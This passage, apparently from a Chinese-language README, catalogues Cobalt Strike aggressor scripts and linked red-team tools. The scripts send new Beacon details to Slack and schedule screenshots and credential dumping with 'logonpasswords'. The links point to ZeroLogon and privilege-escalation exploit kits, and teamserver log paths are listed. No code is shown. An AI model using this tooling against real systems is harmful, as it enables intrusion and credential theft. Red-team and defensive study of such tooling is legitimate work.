|BeaconNotify.cna|1|某个Beacon首次上线时 将这个Beacon的完整信息都发送到指定的Slack Channel [配置你的Slack webhooks](https://api.slack.com/messaging/webhooks)|`host/User/beaconID/os/ver/PID/external IP/internal IP...`| 39 | |LoopDo.cna|0|每隔x分钟执行一次操作 | 按时执行 自定义cmd命令/屏幕截图/logonpasswords/...| 40 | 41 | 42 | #### 补充说明 43 | 44 | teamserver服务器日志 - 文件夹`cobaltstrike/logs/{date}/{ip}` 45 | 46 | |Log Type|ext|location| 47 | |:-----:|-|------------| 48 | |Beacon命令行 所有内容|.log|`/cobaltstrike/logs/191107/10.10.13.19/becon_71256.log`| 49 | |屏幕截图|.jpg|`/cobaltstrike/logs/191107/10.10.13.19/screenshots/screen_050658_87924.jpg`| 50 | 51 | 52 | #### Others 53 | 54 | |author/filename|opsec|desc|demo| 55 | |:-----:|--|------|-------| 56 | | [Cobalt Strike ZeroLogon-BOF](https://github.com/rsmudge/ZeroLogon-BOF) | ? | ZeroLogon CVE-2020-1472 | 57 | | [outflanknl/Ps-Tools](https://github.com/outflanknl/Ps-Tools) PS-Tools.cna | ? | 列出进程的详细信息 |5种命令`psx psk psc psm psh psw` | 58 | | https://github.com/rsmudge/ElevateKit | ? | [官方推荐](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/post-exploitation_privilege-escalation.htm?Highlight=ElevateKit) 多个较新的提权漏洞exp. 版本要求: for Cobalt Strike 3.6 and later. | | 59 | --------------------------------------------------------------------------------